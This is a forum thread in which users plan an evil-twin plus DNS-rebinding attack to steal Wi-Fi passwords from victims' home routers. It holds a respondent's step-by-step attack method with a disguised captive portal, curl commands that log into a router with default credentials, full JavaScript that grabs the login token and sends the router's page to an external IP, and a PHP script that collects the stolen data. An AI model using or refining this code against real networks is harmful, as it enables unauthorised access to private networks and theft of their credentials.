how can i perform dns rebinding using evil twin in local level ?! how can i perform dns rebinding using evil twin in local level ? as the title says i want to perform this attack https://sinister.ly/Thread-DNS-Rebinding-Attack using evil twin on local level the curl command to login into the router curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin" the curl command to get the page that contains the wifi password curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.html this how i was planing to perform the attack evil twining a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it )is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and execute the dns rebinding attack to get the wifi password from his router .... but now i don't know how will get the html file back if want to use it in local level only what do you think folks ?
Interesting attack. Actually with an evil twin you can also exploit the router this way: 1. Your evil twin network range and gateway should be the same as victim's network 2. Create a captive portal at the gateway address like http://192.168.0.1/mycaptiveportal/ 2.1. The link should be unique, so there will be no collision with actual router web pages 2.2. Decorate or disguise it with a loading bar / waiting text / similar infinite animation that will make victim user wait for something 2.3. In the background it should periodically probe for existing router web pages - since we're located at the gateway address, there will be no cross-domain or cross-origin problems, you can just do it with AJAX 3. Once the victim has loaded the page, shut down evil twin, so device will connect back to original AP 4. At this stage the code of captive portal will be able to access real router, it will fetch its main page, and depending on the returned data it will perform further steps (authorization, fetching additional pages or scripts, etc.) 5. Once the code has found the page with Wi-Fi password, it will generate and perform callback to an evil URL outside of gateway (i.e. some URL from the Internet), this can be done by appending <img> or <script> tag with external source to the DOM tree. This method is much easier, and does not require sending any links to the victim. So there are prerequisites for successful exploiting: 1. Properly configured evil twin with captive portal 2. External website with a script configured to receive Wi-Fi password (or any other arbitrary data) 3. Victim user should open captive portal page in browser (because some devices are closing it immediately when disconnecting from evil twin) If you've done everything correctly, you will also get victim's external IP address as a bonus.
thanks i think fluxion already does this but i will need to change the ip to 192.168.1.255 or something so it doesn't interface with the router ! i prefer to just disconnect them from the rouge ap and stop mdk3 . you mean send the page back to my web server ? i think sending a request to enable the second ssid would work if we want to do it totally offline . btw can we make it check if it's connected to the internet if yes then execute the code ?! can we bypass this by making a big button in the middle of the page titled open in the browser ... and when the user clicks on it he gets asked to use the preferred browser to open it ! there is still one problem i don't know AJAX ? so i need someone professional help
Not a good idea, it's broadcast address. There are not many routers supporting multiple VAPs. But if victim's router supports that, it can be done without making external requests. Yes we can, just learn about javascript handlers.
about the part of the code where it exploits the router using ajax! how can i add new commands? or edit it! can someone explain these lines ... the first ones of them! Code: <?php // cache this page for a long time header("Cache-Control: max-age=2592000"); header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60)); ?> <html> <head> </head> <body> <h1>This is a sticky page...</h1> <script> var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/g var timer = setInterval(function(){info();} ,5000); function info() { xhr=new XMLHttpRequest(); xhr.open("GET", "http://ligeti.com/", false); xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send(); var result = pattern.exec(xhr.responseText); //alert (xhr.responseText); if(result != null) { if (result.length > 1) { var login = new XMLHttpRequest(); var param = "frashnum=&action=login&Frm_Logintoken="+result[1]+"&Username=admin&Password=admin"; //console.log(result[1]); login.open("POST", "http://ligeti.com/", false); login.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); login.send(param); //console.log(login.responseText); clearInterval(timer); var template = new XMLHttpRequest(); template.open("GET", "http://ligeti.com/template.gch", false); template.send(); //console.log(template.responseText); alert("Hacked"); sendResults(template.responseText); } } } function sendResults(data) { alert("Sending Data"); myCallback= function(data){console.log(data)} script = document.createElement('script'); script.type = 'text/javascript'; //myData = data.replace(/&/g, "&").replace(/>/g, ">").replace(/</g, "<").replace(/"/g, """); console.log(data); script.src = encodeURI('http://92.253.72.62/catch.php?secret=' + data + '&callback=myCallback'); document.head.appendChild(script); } info(); </script> </body> </html> what i need to change in this code and get the Logintoken from the page? in which format should i save the code? php or html? where do i put this php file Code: <?php $file = '/tmp/secret.html'; $que = $_GET["secret"]; file_put_contents($file, $que); echo ''.$que; ?> what are the missing steps of setting the server ! ? what are they ! how does this one work? var pattern = /getObj\("Frm_Logintoken"\).value = "(. *)"; / g i tried to run it in the console of chrome in the router page but it did not work !
@binarymaster i have tested it and all what i getting is this and when i blocked my ip just like the article i got this any ideas ??
@binarymaster why i did got the cors policy while on local side ? what do you suggest ? should i spoof the router ip ?
@binarymaster after i wrote all the needed code ( from server code to attack code to routers that doesn't store the wifi password in pages but the config file ) and then that step the opening browser instead of the Webview, failed no matter what i tried there was no fix all the solutions on the web didn't ..m now i have to abandon the idea because of this limitation ! I would really like your comment on this. Regards
